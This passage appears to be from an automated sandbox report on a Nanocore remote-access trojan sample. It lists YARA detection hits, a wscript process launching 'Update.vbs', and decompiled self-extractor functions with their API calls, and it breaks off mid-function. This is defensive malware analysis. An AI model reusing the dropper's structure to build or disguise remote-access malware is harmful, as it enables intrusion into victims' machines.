        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.364780852.000000000489A000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.364780852.000000000489A000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.364780852.000000000489A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.360433850.0000000004903000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.360433850.0000000004903000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.360433850.0000000004903000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.360821611.000000000496B000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.360821611.000000000496B000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.360821611.000000000496B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.366099101.0000000004902000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.366099101.0000000004902000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.366099101.0000000004902000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.370237585.0000000004831000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.370237585.0000000004831000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.370237585.0000000004831000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.369728872.0000000004866000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.369728872.0000000004866000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.369728872.0000000004866000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.363076349.00000000039E5000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.363076349.00000000039E5000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.363076349.00000000039E5000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.360037831.0000000004831000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.360037831.0000000004831000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.360037831.0000000004831000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.360563466.0000000004903000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.360563466.0000000004903000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.360563466.0000000004903000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.360697455.0000000004938000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.360697455.0000000004938000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.360697455.0000000004938000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.366655070.0000000004902000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.366655070.0000000004902000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.366655070.0000000004902000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.360273834.0000000004866000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.360273834.0000000004866000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.360273834.0000000004866000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.360354824.00000000048CF000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.360354824.00000000048CF000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.360354824.00000000048CF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.359604202.0000000004866000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.359604202.0000000004866000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.359604202.0000000004866000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

        Chronological Activities

        Analysis Process: wscript.exe PID: 3460 Parent PID: 3352

        General

        Start time:22:29:21
        Start date:11/10/2021
        Path:C:\Windows\System32\wscript.exe
        Wow64 process (32bit):false
        Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\77066510\Update.vbs'
        Imagebase:0x7ff63d490000
        File size:163840 bytes
        MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language

        Chronological Activities

        Disassembly

        Code Analysis

        Reset < >

          Analysis Process: dUzAkYsvl8.exe PID: 6428 Parent PID: 5144 dUzAkYsvl8.exeCOMMON

          Executed Functions

          Function 0020CBB8, Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 199filesleeptimeCOMMON
          Download Yara Rule
          C-Code - Quality: 17%
          			E0020CBB8(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a92, void* _a94, void* _a98, void* _a100, void* _a102, void* _a104, void* _a106, void* _a108, void* _a112, void* _a152, void* _a156, void* _a204) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t41;
				long _t51;
				void* _t54;
				intOrPtr _t58;
				struct HWND__* _t74;
				void* _t75;
				WCHAR* _t95;
				struct HINSTANCE__* _t97;
				intOrPtr _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t125;

				_t125 = __fp0;
				_t89 = __edx;
				E001FFD49(__edx, 1);
				E002095F8("C:\Users\hardz\Desktop", 0x800);
				E00209AA0( &_v208); // executed
				E00201017(0x237370);
				_t74 = 0;
				E0020E920(0x7104, 0x245d08, 0, 0x7104);
				_t106 = _t105 + 0xc;
				_t95 = GetCommandLineW();
				_t110 = _t95;
				if(_t95 != 0) {
					_push(_t95);
					E0020B356(0, _t110);
					if( *0x239601 == 0) {
						E0020C891(__eflags, _t95); // executed
					} else {
						_t103 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t103 != 0) {
							UnmapViewOfFile(_t75);
							_t74 = 0;
						}
						CloseHandle(_t103);
					}
				}
				GetModuleFileNameW(_t74, 0x24ce18, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0x24ce18);
				GetLocalTime(_t106 + 0xc);
				_push( *(_t106 + 0x1a) & 0x0000ffff);
				_push( *(_t106 + 0x1c) & 0x0000ffff);
				_push( *(_t106 + 0x1e) & 0x0000ffff);
				_push( *(_t106 + 0x20) & 0x0000ffff);
				_push( *(_t106 + 0x22) & 0x0000ffff);
				_push( *(_t106 + 0x22) & 0x0000ffff);
				E001F3E41(_t106 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t106 + 0x24) & 0x0000ffff);
				_t107 = _t106 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t107 + 0x7c);
				_t97 = GetModuleHandleW(_t74);
				 *0x230064 = _t97;
				 *0x230060 = _t97; // executed
				_t41 = LoadIconW(_t97, 0x64); // executed
				 *0x23b704 = _t41;
				 *0x245d04 = E0020A4F8(_t89, _t125);
				E001FCFAB(0x230078, _t89, 0x24ce18);
				E002083FC(0);
				E002083FC(0);
				 *0x2375e8 = _t107 + 0x5c;
				 *0x2375ec = _t107 + 0x30; // executed
				DialogBoxParamW(_t97, L"STARTDLG", _t74, E0020A5D1, _t74); // executed
				 *0x2375ec = _t74;
				 *0x2375e8 = _t74;
				E002084AE(_t107 + 0x24);
				E002084AE(_t107 + 0x50);
				_t51 =  *0x24de28;
				if(_t51 != 0) {
					Sleep(_t51);
				}
				if( *0x2385f8 != 0) {
					E00209CA1(0x24ce18);
				}
				E001FE797(0x245c00);
				if( *0x2375e4 > 0) {
					L00212B4E( *0x2375e0);
				}
				DeleteObject( *0x23b704);
				_t54 =  *0x245d04;
				if(_t54 != 0) {
					DeleteObject(_t54);
				}
				if( *0x2300e0 == 0 &&  *0x2375d7 != 0) {
					E001F6E03(0x2300e0, 0xff);
				}
				_t55 =  *0x24de2c;
				 *0x2375d7 = 1;
				if( *0x24de2c != 0) {
					E0020C8F0(_t55);
					CloseHandle( *0x24de2c);
				}
				_t99 =  *0x2300e0; // 0x0
				if( *0x24de21 != 0) {
					_t58 =  *0x22d5fc; // 0x3e8
					if( *0x24de22 == 0) {
						__eflags = _t58;
						if(_t58 < 0) {
							_t99 = _t99 - _t58;
							__eflags = _t99;
						}
					} else {
						_t99 =  *0x24de24;
						if(_t58 > 0) {
							_t99 = _t99 + _t58;
						}
					}
				}
				E00209B08(_t107 + 0x1c); // executed
				return _t99;
			}




















          0x0020cbb8
          0x0020cbb8
          0x0020cbc3
          0x0020cbd2
          0x0020cbdb
          0x0020cbe5
          0x0020cbef
          0x0020cbf8
          0x0020cbfd
          0x0020cc06
          0x0020cc08
          0x0020cc0a
          0x0020cc0c
          0x0020cc0d
          0x0020cc18
          0x0020cc85
          0x0020cc1a
          0x0020cc2d
          0x0020cc31
          0x0020cc72
          0x0020cc78
          0x0020cc78
          0x0020cc7b
          0x0020cc81
          0x0020cc18
          0x0020cc96
          0x0020cca8
          0x0020ccaf
          0x0020ccba
          0x0020ccc0
          0x0020ccc6
          0x0020cccc
          0x0020ccd2
          0x0020ccd8
          0x0020ccee
          0x0020ccf3
          0x0020cd00
          0x0020cd09
          0x0020cd0e
          0x0020cd14
          0x0020cd1a
          0x0020cd20
          0x0020cd30
          0x0020cd35
          0x0020cd3e
          0x0020cd47
          0x0020cd57
          0x0020cd66
          0x0020cd6b
          0x0020cd75
          0x0020cd7b
          0x0020cd81
          0x0020cd8a
          0x0020cd8f
          0x0020cd96
          0x0020cd99
          0x0020cd99
          0x0020cda6
          0x0020cda8
          0x0020cda8
          0x0020cdb2
          0x0020cdbe
          0x0020cdc6
          0x0020cdcb
          0x0020cdd8
          0x0020cdda
          0x0020cde1
          0x0020cde4
          0x0020cde4
          0x0020cded
          0x0020ce02
          0x0020ce02
          0x0020ce07
          0x0020ce0c
          0x0020ce15
          0x0020ce18
          0x0020ce23
          0x0020ce23
          0x0020ce30
          0x0020ce36
          0x0020ce3f
          0x0020ce44
          0x0020ce54
          0x0020ce56
          0x0020ce58
          0x0020ce58
          0x0020ce58
          0x0020ce46
          0x0020ce46
          0x0020ce4e
          0x0020ce50
          0x0020ce50
          0x0020ce4e
          0x0020ce44
          0x0020ce5e
          0x0020ce6e

          APIs
            • Part of subcall function 001FFD49: GetModuleHandleW.KERNEL32 ref: 001FFD61
            • Part of subcall function 001FFD49: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001FFD79
            • Part of subcall function 001FFD49: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001FFD9C
            • Part of subcall function 002095F8: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00209600
            • Part of subcall function 00209AA0: OleInitialize.OLE32(00000000), ref: 00209AB9
            • Part of subcall function 00209AA0: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00209AF0
            • Part of subcall function 00209AA0: SHGetMalloc.SHELL32(002375C0), ref: 00209AFA
            • Part of subcall function 00201017: GetCPInfo.KERNEL32(00000000,?), ref: 00201028
            • Part of subcall function 00201017: IsDBCSLeadByte.KERNEL32(00000000), ref: 0020103C
          • GetCommandLineW.KERNEL32 ref: 0020CC00
          • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0020CC27
          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0020CC38
          • UnmapViewOfFile.KERNEL32(00000000), ref: 0020CC72
            • Part of subcall function 0020C891: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0020C8A7
            • Part of subcall function 0020C891: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0020C8E3
          • CloseHandle.KERNEL32(00000000), ref: 0020CC7B
          • GetModuleFileNameW.KERNEL32(00000000,0024CE18,00000800), ref: 0020CC96
          • SetEnvironmentVariableW.KERNEL32(sfxname,0024CE18), ref: 0020CCA8
          • GetLocalTime.KERNEL32(?), ref: 0020CCAF
          • _swprintf.LIBCMT ref: 0020CCEE
          • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0020CD00
          • GetModuleHandleW.KERNEL32(00000000), ref: 0020CD03
          • LoadIconW.USER32(00000000,00000064), ref: 0020CD1A
          • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001A5D1,00000000), ref: 0020CD6B
          • Sleep.KERNEL32(?), ref: 0020CD99
          • DeleteObject.GDI32 ref: 0020CDD8
          • DeleteObject.GDI32(?), ref: 0020CDE4
          • CloseHandle.KERNEL32 ref: 0020CE23
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$ps#$sfxname$sfxstime$winrarsfxmappingfile.tmp
          • API String ID: 788466649-2301808904
          • Opcode ID: 56af632e36bf408fe15ba120d7c3a63b7696b2f89090fc5707c845074fe88df2
          • Instruction ID: ff5371708b18ea1389539836fabd08d650dc1695bb809ded4e9f1179012f13af
          • Opcode Fuzzy Hash: 56af632e36bf408fe15ba120d7c3a63b7696b2f89090fc5707c845074fe88df2
          • Instruction Fuzzy Hash: 086105B1524311BBD724AFA0FC8DF6B3AA8EB55700F400129F945961D3DB748864CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020963A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 92memorywindowCOMMON
          Download Yara Rule
          C-Code - Quality: 67%
          			E0020963A(WCHAR* _a4) {
				WCHAR* _v4;
				intOrPtr _v8;
				intOrPtr* _v16;
				char _v20;
				void* __ecx;
				struct HRSRC__* _t14;
				WCHAR* _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t26;
				char* _t30;
				long _t32;
				void* _t34;
				intOrPtr* _t35;
				void* _t40;
				struct HRSRC__* _t42;
				intOrPtr* _t44;

				_t14 = FindResourceW( *0x230060, _a4, "PNG");
				_t42 = _t14;
				if(_t42 == 0) {
					return _t14;
				}
				_t32 = SizeofResource( *0x230060, _t42);
				if(_t32 == 0) {
					L4:
					_t16 = 0;
					L16:
					return _t16;
				}
				_t17 = LoadResource( *0x230060, _t42);
				if(_t17 == 0) {
					goto L4;
				}
				_t18 = LockResource(_t17);
				_t43 = _t18;
				if(_t18 != 0) {
					_v4 = 0;
					_t19 = GlobalAlloc(2, _t32); // executed
					_t40 = _t19;
					if(_t40 == 0) {
						L15:
						_t16 = _v4;
						goto L16;
					}
					if(GlobalLock(_t40) == 0) {
						L14:
						GlobalFree(_t40);
						goto L15;
					}
					E0020EA80(_t20, _t43, _t32);
					_a4 = 0;
					_push( &_a4);
					_push(0);
					_push(_t40);
					if( *0x22dff8() == 0) {
						_t26 = E002095CF(_t24, _t34, _v8, 0); // executed
						_t35 = _v16;
						_t44 = _t26;
						 *((intOrPtr*)( *_t35 + 8))(_t35);
						if(_t44 != 0) {
							 *((intOrPtr*)(_t44 + 8)) = 0;
							if( *((intOrPtr*)(_t44 + 8)) == 0) {
								_push(0xffffff);
								_t30 =  &_v20;
								_push(_t30);
								_push( *((intOrPtr*)(_t44 + 4)));
								L0020D81A(); // executed
								if(_t30 != 0) {
									 *((intOrPtr*)(_t44 + 8)) = _t30;
								}
							}
							 *((intOrPtr*)( *_t44))(1);
						}
					}
					GlobalUnlock(_t40);
					goto L14;
				}
				goto L4;
			}





















          0x0020964b
          0x00209651
          0x00209655
          0x00209732
          0x00209732
          0x00209669
          0x0020966d
          0x0020968d
          0x0020968d
          0x0020972f
          0x00000000
          0x0020972f
          0x00209676
          0x0020967e
          0x00000000
          0x00000000
          0x00209681
          0x00209687
          0x0020968b
          0x0020969b
          0x0020969f
          0x002096a5
          0x002096a9
          0x00209729
          0x00209729
          0x00000000
          0x0020972e
          0x002096b4
          0x00209722
          0x00209723
          0x00000000
          0x00209723
          0x002096b9
          0x002096c1
          0x002096c9
          0x002096ca
          0x002096cb
          0x002096d4
          0x002096db
          0x002096e0
          0x002096e4
          0x002096e9
          0x002096ee
          0x002096f3
          0x002096f8
          0x002096fa
          0x002096ff
          0x00209703
          0x00209704
          0x00209707
          0x0020970e
          0x00209710
          0x00209710
          0x0020970e
          0x00209719
          0x00209719
          0x002096ee
          0x0020971c
          0x00000000
          0x0020971c
          0x00000000

          APIs
          • FindResourceW.KERNEL32(00000066,PNG,?,?,0020A54A,00000066), ref: 0020964B
          • SizeofResource.KERNEL32(00000000,76B95B70,?,?,0020A54A,00000066), ref: 00209663
          • LoadResource.KERNEL32(00000000,?,?,0020A54A,00000066), ref: 00209676
          • LockResource.KERNEL32(00000000,?,?,0020A54A,00000066), ref: 00209681
          • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,0020A54A,00000066), ref: 0020969F
          • GlobalLock.KERNEL32 ref: 002096AC
          • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00209707
          • GlobalUnlock.KERNEL32(00000000), ref: 0020971C
          • GlobalFree.KERNEL32 ref: 00209723
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
          • String ID: PNG
          • API String ID: 4097654274-364855578
          • Opcode ID: 3d53e7bd5cb1b61cd58ef6afd19c5a213a07baa45e783542fe985e2ba4c42e65
          • Instruction ID: 2243d1211f05a75f855aa861e8b9556d7c7b2a8d05ce26b9b989ef3865a2fc6d
          • Opcode Fuzzy Hash: 3d53e7bd5cb1b61cd58ef6afd19c5a213a07baa45e783542fe985e2ba4c42e65
          • Instruction Fuzzy Hash: C6216471520316BFC7259FA1EC8CE2BBBADEF45790B054518F946C21A3DB31CC65CAA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FA307, Relevance: 4.6, APIs: 3, Instructions: 84fileCOMMON
          Download Yara Rule
          C-Code - Quality: 87%
          			E001FA307(void* __edx, void* __edi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, struct _WIN32_FIND_DATAW _a20, intOrPtr _a24, intOrPtr _a28, char _a52, short _a612, WCHAR* _a4716) {
				char _v0;
				char _v4;
				void* _t35;
				intOrPtr _t40;
				long _t57;
				char _t58;
				void* _t62;
				void* _t70;
				void* _t71;
				void* _t73;

				_t71 = __edi;
				_t70 = __edx;
				_t35 = FindFirstFileW(_a4716, ??); // executed
				_t73 = _t35;
				if(_t73 != __ebp) {
					L9:
					E001FFAB1(_t71, _a4716, 0x800);
					_push(0x800);
					E001FB9B9(__eflags, _t71,  &_a52);
					_t40 = 0 + _a28;
					__eflags = _t40;
					 *((intOrPtr*)(_t71 + 0x1000)) = _t40;
					asm("adc ecx, 0x0");
					 *((intOrPtr*)(_t71 + 0x1008)) = _v4;
					 *((intOrPtr*)(_t71 + 0x1028)) = _v0;
					 *((intOrPtr*)(_t71 + 0x102c)) = _a4;
					 *((intOrPtr*)(_t71 + 0x1030)) = _a8;
					 *((intOrPtr*)(_t71 + 0x1034)) = _a12;
					 *((intOrPtr*)(_t71 + 0x1038)) = _a16;
					 *(_t71 + 0x103c) = _a20.dwFileAttributes;
					 *((intOrPtr*)(_t71 + 0x1004)) = _a24;
					E00200A81(_t71 + 0x1010, _t70,  &_a16);
					E00200A81(_t71 + 0x1018, _t70,  &_v4);
					E00200A81(_t71 + 0x1020, _t70,  &_v0);
				} else {
					if(E001FB32C(_a4716,  &_a612, 0x800) == 0) {
						L3:
						_t57 = GetLastError();
						if(_t57 == 2 || _t57 == 3 || _t57 == 0x12) {
							_t58 = 0;
							__eflags = 0;
						} else {
							_t58 = 1;
						}
						 *((char*)(_t71 + 0x1044)) = _t58;
					} else {
						_t62 = FindFirstFileW( &_a612,  &_a20); // executed
						_t73 = _t62;
						if(_t73 != __ebp) {
							goto L9;
						} else {
							goto L3;
						}
					}
				}
				 *(_t71 + 0x1040) =  *(_t71 + 0x1040) & 0x00000000;
				return _t73;
			}













          0x001fa307
          0x001fa307
          0x001fa314
          0x001fa316
          0x001fa31a
          0x001fa3a0
          0x001fa3ae
          0x001fa3b3
          0x001fa3ba
          0x001fa3c5
          0x001fa3c5
          0x001fa3c9
          0x001fa3d3
          0x001fa3d6
          0x001fa3e0
          0x001fa3ea
          0x001fa3f4
          0x001fa3fe
          0x001fa408
          0x001fa412
          0x001fa41c
          0x001fa429
          0x001fa439
          0x001fa449
          0x001fa320
          0x001fa33b
          0x001fa352
          0x001fa352
          0x001fa35b
          0x001fa36c
          0x001fa36c
          0x001fa367
          0x001fa369
          0x001fa369
          0x001fa36e
          0x001fa33d
          0x001fa34a
          0x001fa34c
          0x001fa350
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x001fa350
          0x001fa33b
          0x001fa44e
          0x001fa461

          APIs
          • FindFirstFileW.KERNELBASE(?), ref: 001FA314
          • FindFirstFileW.KERNELBASE(?,?,?,?,00000800), ref: 001FA34A
          • GetLastError.KERNEL32(?,?,00000800), ref: 001FA352
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: FileFindFirst$ErrorLast
          • String ID:
          • API String ID: 3443171777-0
          • Opcode ID: 31a98dc3f39f4234e7576eec1ef412f337de67caf2a613f8b1046895e759b911
          • Instruction ID: 6c80283cfb90cbbf2ff710616613fbe7847070dbe4d21c73ce4ed24237e95e9f
          • Opcode Fuzzy Hash: 31a98dc3f39f4234e7576eec1ef412f337de67caf2a613f8b1046895e759b911
          • Instruction Fuzzy Hash: E3314DB6604345AFC324DF64C8C0AEAF3E8BF48340F440A2AF69DC3241D775A9598B92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00216AF3, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E00216AF3(int _a4) {
				void* _t14;
				void* _t16;

				if(E00219D6E(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00216B78(_t14, _t16, _a4);
				ExitProcess(_a4);
			}





          0x00216aff
          0x00216b1b
          0x00216b1b
          0x00216b24
          0x00216b2d

          APIs
          • GetCurrentProcess.KERNEL32(?,?,00216AC9,?,0022A800,0000000C,00216C20,?,00000002,00000000), ref: 00216B14
          • TerminateProcess.KERNEL32(00000000,?,00216AC9,?,0022A800,0000000C,00216C20,?,00000002,00000000), ref: 00216B1B
          • ExitProcess.KERNEL32 ref: 00216B2D
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Process$CurrentExitTerminate
          • String ID:
          • API String ID: 1703294689-0
          • Opcode ID: aeb552daa3380abe4e394a71a894b832eaae312c927ea4699a8e1be65fbb8810
          • Instruction ID: bffb8be488ec55f24ce122d38559f3464da249baa9883d60a9087a96be8f6d4f
          • Opcode Fuzzy Hash: aeb552daa3380abe4e394a71a894b832eaae312c927ea4699a8e1be65fbb8810
          • Instruction Fuzzy Hash: D4E0BF35014108FBCF216F94ED0DD9C3FA9EB64745B005414F90596131CB36EEA6DA50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F83C0, Relevance: 3.9, APIs: 2, Instructions: 940COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 68%
          			E001F83C0(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t370;
				signed int _t374;
				signed int _t375;
				signed int _t380;
				signed int _t385;
				void* _t387;
				signed int _t388;
				signed int _t392;
				signed int _t393;
				signed int _t398;
				signed int _t403;
				signed int _t404;
				signed int _t408;
				signed int _t418;
				signed int _t419;
				signed int _t422;
				signed int _t423;
				signed int _t432;
				char _t434;
				char _t436;
				signed int _t437;
				signed int _t438;
				signed int _t460;
				signed int _t469;
				intOrPtr _t472;
				char _t479;
				signed int _t480;
				void* _t491;
				void* _t499;
				void* _t501;
				signed int _t511;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t520;
				signed int _t523;
				signed int _t531;
				signed int _t541;
				signed int _t543;
				signed int _t545;
				signed int _t547;
				signed char _t548;
				signed int _t551;
				void* _t556;
				signed int _t564;
				intOrPtr* _t574;
				intOrPtr _t576;
